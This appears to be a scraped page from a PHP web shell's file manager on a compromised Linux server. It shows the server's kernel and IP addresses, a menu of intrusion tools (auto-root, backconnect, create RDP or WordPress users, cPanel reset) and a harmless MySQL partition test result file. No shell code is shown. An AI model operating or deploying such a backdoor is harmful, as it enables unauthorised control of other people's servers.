Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.118.173.146
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
mysql /
mysql-test /
suite /
max_parts /
r /
[ HOME SHELL ]
Name
Size
Permission
Action
innodb-import-partition-1.resu...
1.39
KB
-rw-r--r--
partition_max_parts_hash_innod...
1.77
KB
-rw-r--r--
partition_max_parts_hash_myisa...
2.04
KB
-rw-r--r--
partition_max_parts_inv_innodb...
748.54
KB
-rw-r--r--
partition_max_parts_inv_myisam...
748.54
KB
-rw-r--r--
partition_max_parts_key_innodb...
1.69
KB
-rw-r--r--
partition_max_parts_key_myisam...
1.97
KB
-rw-r--r--
partition_max_parts_list_innod...
413.42
KB
-rw-r--r--
partition_max_parts_list_myisa...
413.7
KB
-rw-r--r--
partition_max_parts_range_inno...
335.05
KB
-rw-r--r--
partition_max_parts_range_myis...
335.32
KB
-rw-r--r--
partition_max_sub_parts_key_li...
201.53
KB
-rw-r--r--
partition_max_sub_parts_key_li...
201.8
KB
-rw-r--r--
partition_max_sub_parts_key_ra...
167.12
KB
-rw-r--r--
partition_max_sub_parts_key_ra...
167.39
KB
-rw-r--r--
partition_max_sub_parts_list_i...
201.51
KB
-rw-r--r--
partition_max_sub_parts_list_m...
201.78
KB
-rw-r--r--
partition_max_sub_parts_range_...
167.09
KB
-rw-r--r--
partition_max_sub_parts_range_...
167.37
KB
-rw-r--r--
partition_open_files_limit.res...
1.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : innodb-import-partition-1.result
DROP TABLE IF EXISTS t1; SELECT COUNT(*) FROM t1; COUNT(*) 8192 FLUSH TABLES t1 FOR EXPORT; UNLOCK TABLES; DROP TABLE t1; select count(*) from t1; count(*) 8192 DELETE FROM t1; select count(*) from t1; count(*) 0 ALTER TABLE t1 DISCARD PARTITION p0,p1,p2,p3,p4,p5,p6,p7,p8 TABLESPACE; restore: t1#P#p0 .ibd and .cfg files restore: t1#P#p1 .ibd and .cfg files restore: t1#P#p2 .ibd and .cfg files restore: t1#P#p3 .ibd and .cfg files restore: t1#P#p4 .ibd and .cfg files restore: t1#P#p5 .ibd and .cfg files restore: t1#P#p6 .ibd and .cfg files restore: t1#P#p7 .ibd and .cfg files restore: t1#P#p8 .ibd and .cfg files ALTER TABLE t1 IMPORT PARTITION p0,p1,p2,p3,p4,p5,p6,p7,p8 TABLESPACE; SELECT * FROM t1 PARTITION (p0,p1,p2,p3,p4,p5,p6,p7,p8) ORDER BY i; i 0 1 2 3 4 5 6 7 SELECT * FROM t1 ORDER BY i; i 0 1 2 3 4 5 6 7 ALTER TABLE t1 DISCARD PARTITION p9,p10 TABLESPACE; SELECT * FROM t1 PARTITION (p0,p1,p2,p3,p4,p5,p6,p7,p8) ORDER BY i; i 0 1 2 3 4 5 6 7 ALTER TABLE t1 DISCARD PARTITION all TABLESPACE; Warnings: Warning 1812 InnoDB: Tablespace is missing for table 't1' Warning 1812 InnoDB: Tablespace is missing for table 't1' ALTER TABLE t1 IMPORT PARTITION all TABLESPACE; SELECT * FROM t1 PARTITION (p0,p1,p2,p3,p4,p5,p6,p7,p8) ORDER BY i; i 0 1 2 3 4 5 6 7 SELECT COUNT(*) FROM t1 ORDER BY i; COUNT(*) 8192 SELECT * FROM t1 WHERE i%1000 = 0 ORDER BY i; i 0 1000 2000 3000 4000 5000 6000 7000 8000 DROP TABLE t1;
Close